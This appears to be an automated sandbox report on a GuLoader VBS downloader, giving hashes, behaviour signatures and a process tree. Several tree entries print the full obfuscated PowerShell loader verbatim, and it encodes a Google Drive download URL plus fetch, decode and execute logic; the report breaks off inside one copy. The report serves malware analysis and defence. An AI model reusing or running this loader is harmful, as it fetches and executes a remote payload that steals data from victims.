Analysis
-
max time kernel
147s -
max time network
117s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
24-09-2024 08:21
Static task
static1
Behavioral task
behavioral1
Sample
????.vbs
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
????.vbs
Resource
win10v2004-20240802-en
General
-
Target
????.vbs
-
Size
34KB
-
MD5
641139188c9eb5ee84d12eebb22e0dad
-
SHA1
9fe97ca78a39d50bfa2610e3f4b8a76e4db78377
-
SHA256
6ff407811ce5f14f5302bcb2646e67946293cb333f6c8550801d80fea2af9ec1
-
SHA512
d1781c8319f13d4d5e66b68e77b8b887a62eaea93aabb74770e396402ec11a2f5f81c213765c7a59d6ac4ac049df76ff459c1a4cc238257f1410bbf16aed462f
-
SSDEEP
384:3Y2yRfD0I1dAONNjvmRr/fZzhACSFKeEQ:UfII1dpbjy9zhAhU6
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Blocklisted process makes network request 3 IoCs
flow pid Process 3 3024 WScript.exe 7 1728 powershell.exe 9 1728 powershell.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook wabmig.exe Key opened \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook wabmig.exe Key opened \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook wabmig.exe -
pid Process 2572 powershell.exe 1728 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 7 drive.google.com 11 drive.google.com 6 drive.google.com -
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
pid Process 1732 wabmig.exe 1732 wabmig.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2572 powershell.exe 1732 wabmig.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2572 set thread context of 1732 2572 powershell.exe 38 -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wabmig.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2572 powershell.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 1728 powershell.exe 2572 powershell.exe 2572 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2572 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 1728 powershell.exe Token: SeDebugPrivilege 2572 powershell.exe Token: SeDebugPrivilege 1732 wabmig.exe -
Suspicious use of WriteProcessMemory 23 IoCs
description pid Process procid_target PID 3024 wrote to memory of 1728 3024 WScript.exe 31 PID 3024 wrote to memory of 1728 3024 WScript.exe 31 PID 3024 wrote to memory of 1728 3024 WScript.exe 31 PID 1728 wrote to memory of 2724 1728 powershell.exe 33 PID 1728 wrote to memory of 2724 1728 powershell.exe 33 PID 1728 wrote to memory of 2724 1728 powershell.exe 33 PID 1728 wrote to memory of 2624 1728 powershell.exe 35 PID 1728 wrote to memory of 2624 1728 powershell.exe 35 PID 1728 wrote to memory of 2624 1728 powershell.exe 35 PID 2624 wrote to memory of 2572 2624 cmd.exe 36 PID 2624 wrote to memory of 2572 2624 cmd.exe 36 PID 2624 wrote to memory of 2572 2624 cmd.exe 36 PID 2624 wrote to memory of 2572 2624 cmd.exe 36 PID 2572 wrote to memory of 536 2572 powershell.exe 37 PID 2572 wrote to memory of 536 2572 powershell.exe 37 PID 2572 wrote to memory of 536 2572 powershell.exe 37 PID 2572 wrote to memory of 536 2572 powershell.exe 37 PID 2572 wrote to memory of 1732 2572 powershell.exe 38 PID 2572 wrote to memory of 1732 2572 powershell.exe 38 PID 2572 wrote to memory of 1732 2572 powershell.exe 38 PID 2572 wrote to memory of 1732 2572 powershell.exe 38 PID 2572 wrote to memory of 1732 2572 powershell.exe 38 PID 2572 wrote to memory of 1732 2572 powershell.exe 38 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook wabmig.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook wabmig.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\____.vbs"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:3024 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Rockerlov Misundelig Boksestvne Klimaerne #>;$Nonimitative='Restaurere';<#Selvironiske surmuleriets Roquefortostenes Uptend Unbaptized minoriteten #>;$Sarcoblast=$host.PrivateData;If ($Sarcoblast) {$Bjeliges++;}function Trkkenaalens($Fremtidigt){$Splurgier=$Fremtidigt.Length-$Bjeliges;for( $Dobbelterklringerne=5;$Dobbelterklringerne -lt $Splurgier;$Dobbelterklringerne+=6){$Behndige78+=$Fremtidigt[$Dobbelterklringerne];}$Behndige78;}function Reprobateness($Hummingbirds){ .($Sammenspillet23) ($Hummingbirds);}$Jernets=Trkkenaalens 'OmbryMSvingo Photz ForeiStocklCisselPregrasnoha/Ska f5Mensa. Forl0 dluf Tub,s(DatakWSyndeiLoanwn R ctdHemiboBrookw TekksR,sid OligaN araTCarir Seru 1Pilra0bukse..vort0 Husm;Mau s ndgaWgawd,iO.vurn Sup,6Karve4 Uv.n;Conti stvlexGrada6Steph4 Besl;Supra Synerr TorevTreaa:,espe1alkal2L kns1 olem.Allot0 Muse)Vende AutogG Peg,eFrihecOpvkkkV sicoEnnea/Re lk2Compo0me.ic1pref,0Tesk 0 Gour1H emm0u.vir1Ev.nc Indb FDisliiHaevnr Tamue onvef Perso,ouflxBibli/Gynth1 El,v2L,ber1 Task.Komma0Snipp ';$Compulsively=Trkkenaalens 'delkoUkonsusAgnelEDrhamrToby -Cot,hA FersG elliEOv.rhNVi erTOutpu ';$Learns=Trkkenaalens ' StrahElopetSar.et O hepPit,wsv lds:Synsv/Pyroc/ UnimdAcknorGnistiTransvelopeesovse.,iveigAnteno Fjoro WategDemi,lanthreIdeoo.SemitcPhotso T.mum Bull/tucanu TogfcGuldf? LateeeksplxT.kkepFagd oGgepur .eartGrund=hrgard ,oftoCiterwDomeynPersolSmed oBarbaa SnakdFuthe& RecoiPh eod inse= Supe1DegenhColoux GainzKonkls LamiJGendrQCent ACu tuCUnhelMThedkpCompuCCluffK VoddcDom.eDBitne8S dedstop aGTudeh1GalaccWarlorOblitXcru i4Hand uBa.lo- NybecPanthODion YContr1 rbejCF,rtlvslammx guilRO.era ';$Uglens=Trkkenaalens ' Nonb>Subst ';$Sammenspillet23=Trkkenaalens ' aybrI afl ET ndeX cott ';$Kriminalbetjentens='Militarization';$Aabningssaldo = Trkkenaalens 'U enle opucTerrnhGenneo Sigi Th l%grydea uritp S abpUnpumdGaudiaIndsktCerciaIrre.%Aftrk\ GigtGguldseDispol Vad a Sti twritmiSemitn TermeCryptr LseknToxinecrena.Sci,pAR ssouTwinit Baiz Bim & Ster& oxi Sn wfeCordncGeleah Sporo Temp Ger wt Undi ';Reprobateness (Trkkenaalens 'Embod$Archig Servl HeatoJura bPoltiaDyreklborts:FestiK A beo AppedCyanee MinisAfbent LeksrQuadre erinKathag apireCrittnA chasTuber=Ved a(SuggecomdigmFabu d llit Intra/A rsocViper Hexyl$OsmanAgimbaaAntinb P.rjnKe seiFartgnFreelg Esers lecysThorna AllolRepardB viooUnfam) Diss ');Reprobateness (Trkkenaalens ' sade$St llgMajorlekspoo.ryptb nonaa,ipenlU.exc:CaderHTip oi ProgbupdiveMultar DournA,resaCanontPirane Ia,td.hrom= .ver$Un,emLSemi,eNerveaHyg erMemo,nRa,posMarve.GartnsSkranp Out l P raiCybortklvni( omal$KonceUGolcogFubsilCoexieFjendnnontrsDrift)Tichi ');Reprobateness (Trkkenaalens 'Rekvi[AppetNafrikeMonomtDelbe.DivorS Va neDe ktr Makrv rostiDru hcExioneKandiP teoloSovjeiTidslnIrr,ptFudgeMAntecaMon rnM.riaa Pum,gHypoteFi kirskyde]Kbm n:Cofer:ForsrSG.ardeUddstc,nderu SuddrSta diMrk nt Praey tykkPSkyder CadeoWraxltutilfoRafficMolewoKampelKonci Saldo=Syst ,efer[hvsedN eledeFondst Na.n. PeguSAecioesprayc SelsuStrudrRubbii c mptBl,ckyUd.adPSkudlr bateoAppaltKroopoklappcDiscoogentalB,andTNst ry rosep Soote Sav,]Route: k ar:BenovTRe,atlSc ers I va1 Amaz2Unde, ');$Learns=$Hibernated[0];$Pantsttelse= (Trkkenaalens 'Bro,k$ Ma bGgeschLNaturo D prBRundsaSlvsklKomma: mkfM mporAInfornSailanEntice Cas SDrovesWillu=BeskynUnca E oaliw Best-SchniO KommBFav sJBrandEOprrecPapilT Cook MimlysDiskeY TrikSSl,mbt Be.ie TappM Prot.Opp.enRgelsETrediTRustn.eschewmirthEBjendB risbcCr pelKindjI.anthemo phnBillet');$Pantsttelse+=$Kodestrengens[1];Reprobateness ($Pantsttelse);Reprobateness (Trkkenaalens ' ,pre$D doeMSumpta orevnT.ansnSupereUnditsForkbsTsr t.HekseHSemimeBoligaYndlid.ysteeValkyr Elems Oere[Afhas$OutclCFla loWellimNotarpArustuVarmelDirigsBel aiBristvSt egeMisbrlSundhyParil]Retsl=K tap$InbreJbetjeespecir IssynV kste StrotOcclusM rha ');$Amtsskattekredsenes=Trkkenaalens 'Samvr$,mbinMAp elaudtrrnhadinnSve fePercis Irres ejla.KlausDFjerdoSprogwSausan mlonlTvisto kumlaBarbadBandoFOplagi HundlgstelePsyke(St,rt$Dipl LUrohyeL bera Ladlr Discn Smadsmammu,Hornb$ TidsuPsyc sflygte Def l SemivUnif.iAflnnsCo,enkJusteeAfskr) olde ';$uselviske=$Kodestrengens[0];Reprobateness (Trkkenaalens ' fran$SubnagNyttelUsquaOProgrbForlyAserviLChr,n:Pe svl landOUnappp SminhMo.kkoMarimb SnaprAff iaKlat N FrikC Windhda oe1V rni0Pauci=Stodg(Ugen T fedte PalesFormut Sovj-GstelpHersaAEctostPattih Twin Fore$ResegU lagsStri.ePartalSt rtvAfblni Ora.sGobetk iagneSlate)St kr ');while (!$Lophobranch10) {Reprobateness (Trkkenaalens 'Drabs$Be,ingCatablBa,ytoAnthobForuraC rdplI,pas:Ad naBOpstraMolocrProceyDubbatDimiso.pflosLateduMe fal hypop yclh MobiaglanstPro rePostv=Stati$Ro sstTryparCapitu UdskeSit e ') ;Reprobateness $Amtsskattekredsenes;Reprobateness (Trkkenaalens 'Ungu.S TalltGollyaHalbarEksekt,irmi-TaetbSArdeblK.dnaeNum,eeStarbpFaine Guilf4 Pr,d ');Reprobateness (Trkkenaalens ' Stvd$Kloneg KvldlAeropo SubsbBebygaAfskelWloka:RykniLNecreobrostpBowsth kvaoBetnkbTe ver neraaLawyenTriphcUnatuh Bund1Ampel0Avl,a=Bundm(ma.toTKoffae UdfosdipodtStj,r-p eudPTyndta afft Dexth talt Fretf$TarteuContusneu reIsoprlGentev T uci ,nsas Mrklk EuroeWindo) Av i ') ;Reprobateness (Trkkenaalens ' Gram$ BrangEidoslLuftio Impob Sk ba arnal Extr: DispCRevenoBovnerOutk n ind,s.ridetBl dgaDropnrSkr ecSengehL.nds=Bosta$MahargVedlil,xioloWhippbH ulsaDrosklsaltu:stenuHNondiaFortal EftevCentrkExhumuSkr bsHistoi readnSukkeePragmnNoncosCyno,+afnde+ Pigt%Lathe$ JettH ,risiRooyebUlvaseOe oprAppetnStanca uncettrngteTrakedEstud.HydrocOnd loBl reuParatnStumbtOrgan ') ;$Learns=$Hibernated[$Cornstarch];}$Performativ=318381;$Creep=30121;Reprobateness (Trkkenaalens 'Aaben$PostpgUlysslOdaluo GonibVid.oaDiplel tele:Alsi CUnredyU gumkU deteDagdrlGlycohParasjSubwae Bortlnav,gmOra g Vokse=Levne SprjtGGe tieGodvitCockl-com lC P lyoskemancorontSkrekeSkandn ctitSamle Se,ul$ G,mluukends Bline,oncolC shovBrydsiKolors mbakKrikkestarr ');Reprobateness (Trkkenaalens 'Dul e$ AflegLogiclOssico s.ryb SlubaWire.l Impa:I posN BurroProgrn ForsuLeucon Om ui ediktGeomeyIn se Spir=Tri s ,rune[RygklSTerroyOvermsDdsantFleeceFestlmNonic.InvolCOutflo talinBealav TankeRidderrettetKatar]Dogn,:sti e:Til.lF Wat.rstarto ScutmPers BTerpeaMtaa,s timweAut r6Richm4T ksoSNursetpestarSamleiBase n .ictgProdu( nonc$EksisCJawfay BrdbkS yggeDichllSkraahScripjfa.oreMiniclOutstm,atte)S,abm ');Reprobateness (Trkkenaalens 'Vindu$Hav rgThalalFagkooUnmarb elsiaOverdl Un p: KontCsakt iSu ejrUriaskHindsudashbs Undem Sup aPostrnK dnaePunitgEl sae Proxnnu.ins Foll Sa ku= Di p Champ[CheveS Intey GrotsSkibstTvisteLe tim Infe.WilloTAlle,eSubroxTagryt Rwan.Rykk.EAppronBaregcSemisoTils dFormsitropon SfyrgSa kv]Blvre:Whenc: SoleA T deS,reebCPrenoILes hISl ep.ZulkaGPeride rect Hyt,SD.legt KrakrNain iTomatn Sp ogCassa(bo sa$TypotN LichoOceannkomp.u N henfilteiP orotUdspiy poly)Forbu ');Reprobateness (Trkkenaalens ' Lung$Wi.elgMethylOodlioU detbFljteaWeirdl Ultr: Ue gLPrecioMonumdTibetrtrlaseMucrotGela = .nsu$ BremCMiau iHeikkrTu bokfleayu GudssForbimFungaaCart nKampae Attrgm rsheVindbnmisesssiren.Ce.trs Specu ndebOverps Re,ttInjunrblanki StagnMiljfgDou h(Sl tb$ FlavPM neleSn errBussefSaneroRefler iphtmBurhiaSavkltgypsii AllavEsche,Spise$Un,auCFstner Row.eT,rkieZeoidpDal l)Int l ');Reprobateness $Lodret;"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1728 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Gelatinerne.Aut && echo t"3⤵PID:2724
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Rockerlov Misundelig Boksestvne Klimaerne #>;$Nonimitative='Restaurere';<#Selvironiske surmuleriets Roquefortostenes Uptend Unbaptized minoriteten #>;$Sarcoblast=$host.PrivateData;If ($Sarcoblast) {$Bjeliges++;}function Trkkenaalens($Fremtidigt){$Splurgier=$Fremtidigt.Length-$Bjeliges;for( $Dobbelterklringerne=5;$Dobbelterklringerne -lt $Splurgier;$Dobbelterklringerne+=6){$Behndige78+=$Fremtidigt[$Dobbelterklringerne];}$Behndige78;}function Reprobateness($Hummingbirds){ .($Sammenspillet23) ($Hummingbirds);}$Jernets=Trkkenaalens 'OmbryMSvingo Photz ForeiStocklCisselPregrasnoha/Ska f5Mensa. Forl0 dluf Tub,s(DatakWSyndeiLoanwn R ctdHemiboBrookw TekksR,sid OligaN araTCarir Seru 1Pilra0bukse..vort0 Husm;Mau s ndgaWgawd,iO.vurn Sup,6Karve4 Uv.n;Conti stvlexGrada6Steph4 Besl;Supra Synerr TorevTreaa:,espe1alkal2L kns1 olem.Allot0 Muse)Vende AutogG Peg,eFrihecOpvkkkV sicoEnnea/Re lk2Compo0me.ic1pref,0Tesk 0 Gour1H emm0u.vir1Ev.nc Indb FDisliiHaevnr Tamue onvef Perso,ouflxBibli/Gynth1 El,v2L,ber1 Task.Komma0Snipp ';$Compulsively=Trkkenaalens 'delkoUkonsusAgnelEDrhamrToby -Cot,hA FersG elliEOv.rhNVi erTOutpu ';$Learns=Trkkenaalens ' StrahElopetSar.et O hepPit,wsv lds:Synsv/Pyroc/ UnimdAcknorGnistiTransvelopeesovse.,iveigAnteno Fjoro WategDemi,lanthreIdeoo.SemitcPhotso T.mum Bull/tucanu TogfcGuldf? LateeeksplxT.kkepFagd oGgepur .eartGrund=hrgard ,oftoCiterwDomeynPersolSmed oBarbaa SnakdFuthe& RecoiPh eod inse= Supe1DegenhColoux GainzKonkls LamiJGendrQCent ACu tuCUnhelMThedkpCompuCCluffK VoddcDom.eDBitne8S dedstop aGTudeh1GalaccWarlorOblitXcru i4Hand uBa.lo- NybecPanthODion YContr1 rbejCF,rtlvslammx guilRO.era ';$Uglens=Trkkenaalens ' Nonb>Subst ';$Sammenspillet23=Trkkenaalens ' aybrI afl ET ndeX cott ';$Kriminalbetjentens='Militarization';$Aabningssaldo = Trkkenaalens 'U enle opucTerrnhGenneo Sigi Th l%grydea uritp S abpUnpumdGaudiaIndsktCerciaIrre.%Aftrk\ GigtGguldseDispol Vad a Sti twritmiSemitn TermeCryptr LseknToxinecrena.Sci,pAR ssouTwinit Baiz Bim & Ster& oxi Sn wfeCordncGeleah Sporo Temp Ger wt Undi ';Reprobateness (Trkkenaalens 'Embod$Archig Servl HeatoJura bPoltiaDyreklborts:FestiK A beo AppedCyanee MinisAfbent LeksrQuadre erinKathag apireCrittnA chasTuber=Ved a(SuggecomdigmFabu d llit Intra/A rsocViper Hexyl$OsmanAgimbaaAntinb P.rjnKe seiFartgnFreelg Esers lecysThorna AllolRepardB viooUnfam) Diss ');Reprobateness (Trkkenaalens ' sade$St llgMajorlekspoo.ryptb nonaa,ipenlU.exc:CaderHTip oi ProgbupdiveMultar DournA,resaCanontPirane Ia,td.hrom= .ver$Un,emLSemi,eNerveaHyg erMemo,nRa,posMarve.GartnsSkranp Out l P raiCybortklvni( omal$KonceUGolcogFubsilCoexieFjendnnontrsDrift)Tichi ');Reprobateness (Trkkenaalens 'Rekvi[AppetNafrikeMonomtDelbe.DivorS Va neDe ktr Makrv rostiDru hcExioneKandiP teoloSovjeiTidslnIrr,ptFudgeMAntecaMon rnM.riaa Pum,gHypoteFi kirskyde]Kbm n:Cofer:ForsrSG.ardeUddstc,nderu SuddrSta diMrk nt Praey tykkPSkyder CadeoWraxltutilfoRafficMolewoKampelKonci Saldo=Syst ,efer[hvsedN eledeFondst Na.n. PeguSAecioesprayc SelsuStrudrRubbii c mptBl,ckyUd.adPSkudlr bateoAppaltKroopoklappcDiscoogentalB,andTNst ry rosep Soote Sav,]Route: k ar:BenovTRe,atlSc ers I va1 Amaz2Unde, ');$Learns=$Hibernated[0];$Pantsttelse= (Trkkenaalens 'Bro,k$ Ma bGgeschLNaturo D prBRundsaSlvsklKomma: mkfM mporAInfornSailanEntice Cas SDrovesWillu=BeskynUnca E oaliw Best-SchniO KommBFav sJBrandEOprrecPapilT Cook MimlysDiskeY TrikSSl,mbt Be.ie TappM Prot.Opp.enRgelsETrediTRustn.eschewmirthEBjendB risbcCr pelKindjI.anthemo phnBillet');$Pantsttelse+=$Kodestrengens[1];Reprobateness ($Pantsttelse);Reprobateness (Trkkenaalens ' ,pre$D doeMSumpta orevnT.ansnSupereUnditsForkbsTsr t.HekseHSemimeBoligaYndlid.ysteeValkyr Elems Oere[Afhas$OutclCFla loWellimNotarpArustuVarmelDirigsBel aiBristvSt egeMisbrlSundhyParil]Retsl=K tap$InbreJbetjeespecir IssynV kste StrotOcclusM rha ');$Amtsskattekredsenes=Trkkenaalens 'Samvr$,mbinMAp elaudtrrnhadinnSve fePercis Irres ejla.KlausDFjerdoSprogwSausan mlonlTvisto kumlaBarbadBandoFOplagi HundlgstelePsyke(St,rt$Dipl LUrohyeL bera Ladlr Discn Smadsmammu,Hornb$ TidsuPsyc sflygte Def l SemivUnif.iAflnnsCo,enkJusteeAfskr) olde ';$uselviske=$Kodestrengens[0];Reprobateness (Trkkenaalens ' fran$SubnagNyttelUsquaOProgrbForlyAserviLChr,n:Pe svl landOUnappp SminhMo.kkoMarimb SnaprAff iaKlat N FrikC Windhda oe1V rni0Pauci=Stodg(Ugen T fedte PalesFormut Sovj-GstelpHersaAEctostPattih Twin Fore$ResegU lagsStri.ePartalSt rtvAfblni Ora.sGobetk iagneSlate)St kr ');while (!$Lophobranch10) {Reprobateness (Trkkenaalens 'Drabs$Be,ingCatablBa,ytoAnthobForuraC rdplI,pas:Ad naBOpstraMolocrProceyDubbatDimiso.pflosLateduMe fal hypop yclh MobiaglanstPro rePostv=Stati$Ro sstTryparCapitu UdskeSit e ') ;Reprobateness $Amtsskattekredsenes;Reprobateness (Trkkenaalens 'Ungu.S TalltGollyaHalbarEksekt,irmi-TaetbSArdeblK.dnaeNum,eeStarbpFaine Guilf4 Pr,d ');Reprobateness (Trkkenaalens ' Stvd$Kloneg KvldlAeropo SubsbBebygaAfskelWloka:RykniLNecreobrostpBowsth kvaoBetnkbTe ver neraaLawyenTriphcUnatuh Bund1Ampel0Avl,a=Bundm(ma.toTKoffae UdfosdipodtStj,r-p eudPTyndta afft Dexth talt Fretf$TarteuContusneu reIsoprlGentev T uci ,nsas Mrklk EuroeWindo) Av i ') ;Reprobateness (Trkkenaalens ' Gram$ BrangEidoslLuftio Impob Sk ba arnal Extr: DispCRevenoBovnerOutk n ind,s.ridetBl dgaDropnrSkr ecSengehL.nds=Bosta$MahargVedlil,xioloWhippbH ulsaDrosklsaltu:stenuHNondiaFortal EftevCentrkExhumuSkr bsHistoi readnSukkeePragmnNoncosCyno,+afnde+ Pigt%Lathe$ JettH ,risiRooyebUlvaseOe oprAppetnStanca uncettrngteTrakedEstud.HydrocOnd loBl reuParatnStumbtOrgan ') ;$Learns=$Hibernated[$Cornstarch];}$Performativ=318381;$Creep=30121;Reprobateness (Trkkenaalens 'Aaben$PostpgUlysslOdaluo GonibVid.oaDiplel tele:Alsi CUnredyU gumkU deteDagdrlGlycohParasjSubwae Bortlnav,gmOra g Vokse=Levne SprjtGGe tieGodvitCockl-com lC P lyoskemancorontSkrekeSkandn ctitSamle Se,ul$ G,mluukends Bline,oncolC shovBrydsiKolors mbakKrikkestarr ');Reprobateness (Trkkenaalens 'Dul e$ AflegLogiclOssico s.ryb SlubaWire.l Impa:I posN BurroProgrn ForsuLeucon Om ui ediktGeomeyIn se Spir=Tri s ,rune[RygklSTerroyOvermsDdsantFleeceFestlmNonic.InvolCOutflo talinBealav TankeRidderrettetKatar]Dogn,:sti e:Til.lF Wat.rstarto ScutmPers BTerpeaMtaa,s timweAut r6Richm4T ksoSNursetpestarSamleiBase n .ictgProdu( nonc$EksisCJawfay BrdbkS yggeDichllSkraahScripjfa.oreMiniclOutstm,atte)S,abm ');Reprobateness (Trkkenaalens 'Vindu$Hav rgThalalFagkooUnmarb elsiaOverdl Un p: KontCsakt iSu ejrUriaskHindsudashbs Undem Sup aPostrnK dnaePunitgEl sae Proxnnu.ins Foll Sa ku= Di p Champ[CheveS Intey GrotsSkibstTvisteLe tim Infe.WilloTAlle,eSubroxTagryt Rwan.Rykk.EAppronBaregcSemisoTils dFormsitropon SfyrgSa kv]Blvre:Whenc: SoleA T deS,reebCPrenoILes hISl ep.ZulkaGPeride rect Hyt,SD.legt KrakrNain iTomatn Sp ogCassa(bo sa$TypotN LichoOceannkomp.u N henfilteiP orotUdspiy poly)Forbu ');Reprobateness (Trkkenaalens ' Lung$Wi.elgMethylOodlioU detbFljteaWeirdl Ultr: Ue gLPrecioMonumdTibetrtrlaseMucrotGela = .nsu$ BremCMiau iHeikkrTu bokfleayu GudssForbimFungaaCart nKampae Attrgm rsheVindbnmisesssiren.Ce.trs Specu ndebOverps Re,ttInjunrblanki StagnMiljfgDou h(Sl tb$ FlavPM neleSn errBussefSaneroRefler iphtmBurhiaSavkltgypsii AllavEsche,Spise$Un,auCFstner Row.eT,rkieZeoidpDal l)Int l ');Reprobateness $Lodret;"3⤵
- Suspicious use of WriteProcessMemory
PID:2624 -
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Rockerlov Misundelig Boksestvne Klimaerne #>;$Nonimitative='Restaurere';<#Selvironiske surmuleriets Roquefortostenes Uptend Unbaptized minoriteten #>;$Sarcoblast=$host.PrivateData;If ($Sarcoblast) {$Bjeliges++;}function Trkkenaalens($Fremtidigt){$Splurgier=$Fremtidigt.Length-$Bjeliges;for( $Dobbelterklringerne=5;$Dobbelterklringerne -lt $Splurgier;$Dobbelterklringerne+=6){$Behndige78+=$Fremtidigt[$Dobbelterklringerne];}$Behndige78;}function Reprobateness($Hummingbirds){ .($Sammenspillet23) ($Hummingbirds);}$Jernets=Trkkenaalens 'OmbryMSvingo Photz ForeiStocklCisselPregrasnoha/Ska f5Mensa. Forl0 dluf Tub,s(DatakWSyndeiLoanwn R ctdHemiboBrookw TekksR,sid OligaN araTCarir Seru 1Pilra0bukse..vort0 Husm;Mau s ndgaWgawd,iO.vurn Sup,6Karve4 Uv.n;Conti stvlexGrada6Steph4 Besl;Supra Synerr TorevTreaa:,espe1alkal2L kns1 olem.Allot0 Muse)Vende AutogG Peg,eFrihecOpvkkkV sicoEnnea/Re lk2Compo0me.ic1pref,0Tesk 0 Gour1H emm0u.vir1Ev.nc Indb FDisliiHaevnr Tamue onvef Perso,ouflxBibli/Gynth1 El,v2L,ber1 Task.Komma0Snipp ';$Compulsively=Trkkenaalens 'delkoUkonsusAgnelEDrhamrToby -Cot,hA FersG elliEOv.rhNVi erTOutpu ';$Learns=Trkkenaalens ' StrahElopetSar.et O hepPit,wsv lds:Synsv/Pyroc/ UnimdAcknorGnistiTransvelopeesovse.,iveigAnteno Fjoro WategDemi,lanthreIdeoo.SemitcPhotso T.mum Bull/tucanu TogfcGuldf? LateeeksplxT.kkepFagd oGgepur .eartGrund=hrgard ,oftoCiterwDomeynPersolSmed oBarbaa SnakdFuthe& RecoiPh eod inse= Supe1DegenhColoux GainzKonkls LamiJGendrQCent ACu tuCUnhelMThedkpCompuCCluffK VoddcDom.eDBitne8S dedstop aGTudeh1GalaccWarlorOblitXcru i4Hand uBa.lo- NybecPanthODion YContr1 rbejCF,rtlvslammx guilRO.era ';$Uglens=Trkkenaalens ' Nonb>Subst ';$Sammenspillet23=Trkkenaalens ' aybrI afl ET ndeX cott ';$Kriminalbetjentens='Militarization';$Aabningssaldo = Trkkenaalens 'U enle opucTerrnhGenneo Sigi Th l%grydea uritp S abpUnpumdGaudiaIndsktCerciaIrre.%Aftrk\ GigtGguldseDispol Vad a Sti twritmiSemitn TermeCryptr LseknToxinecrena.Sci,pAR ssouTwinit Baiz Bim & Ster& oxi Sn wfeCordncGeleah Sporo Temp Ger wt Undi ';Reprobateness (Trkkenaalens 'Embod$Archig Servl HeatoJura bPoltiaDyreklborts:FestiK A beo AppedCyanee MinisAfbent LeksrQuadre erinKathag apireCrittnA chasTuber=Ved a(SuggecomdigmFabu d llit Intra/A rsocViper Hexyl$OsmanAgimbaaAntinb P.rjnKe seiFartgnFreelg Esers lecysThorna AllolRepardB viooUnfam) Diss ');Reprobateness (Trkkenaalens ' sade$St llgMajorlekspoo.ryptb nonaa,ipenlU.exc:CaderHTip oi ProgbupdiveMultar DournA,resaCanontPirane Ia,td.hrom= .ver$Un,emLSemi,eNerveaHyg erMemo,nRa,posMarve.GartnsSkranp Out l P raiCybortklvni( omal$KonceUGolcogFubsilCoexieFjendnnontrsDrift)Tichi ');Reprobateness (Trkkenaalens 'Rekvi[AppetNafrikeMonomtDelbe.DivorS Va neDe ktr Makrv rostiDru hcExioneKandiP teoloSovjeiTidslnIrr,ptFudgeMAntecaMon rnM.riaa Pum,gHypoteFi kirskyde]Kbm n:Cofer:ForsrSG.ardeUddstc,nderu SuddrSta diMrk nt Praey tykkPSkyder CadeoWraxltutilfoRafficMolewoKampelKonci Saldo=Syst ,efer[hvsedN eledeFondst Na.n. PeguSAecioesprayc SelsuStrudrRubbii c mptBl,ckyUd.adPSkudlr bateoAppaltKroopoklappcDiscoogentalB,andTNst ry rosep Soote Sav,]Route: k ar:BenovTRe,atlSc ers I va1 Amaz2Unde, ');$Learns=$Hibernated[0];$Pantsttelse= (Trkkenaalens 'Bro,k$ Ma bGgeschLNaturo D prBRundsaSlvsklKomma: mkfM mporAInfornSailanEntice Cas SDrovesWillu=BeskynUnca E oaliw Best-SchniO KommBFav sJBrandEOprrecPapilT Cook MimlysDiskeY TrikSSl,mbt Be.ie TappM Prot.Opp.enRgelsETrediTRustn.eschewmirthEBjendB risbcCr pelKindjI.anthemo phnBillet');$Pantsttelse+=$Kodestrengens[1];Reprobateness ($Pantsttelse);Reprobateness (Trkkenaalens ' ,pre$D doeMSumpta orevnT.ansnSupereUnditsForkbsTsr t.HekseHSemimeBoligaYndlid.ysteeValkyr Elems Oere[Afhas$OutclCFla loWellimNotarpArustuVarmelDirigsBel aiBristvSt egeMisbrlSundhyParil]Retsl=K tap$InbreJbetjeespecir IssynV kste StrotOcclusM rha ');$Amtsskattekredsenes=Trkkenaalens 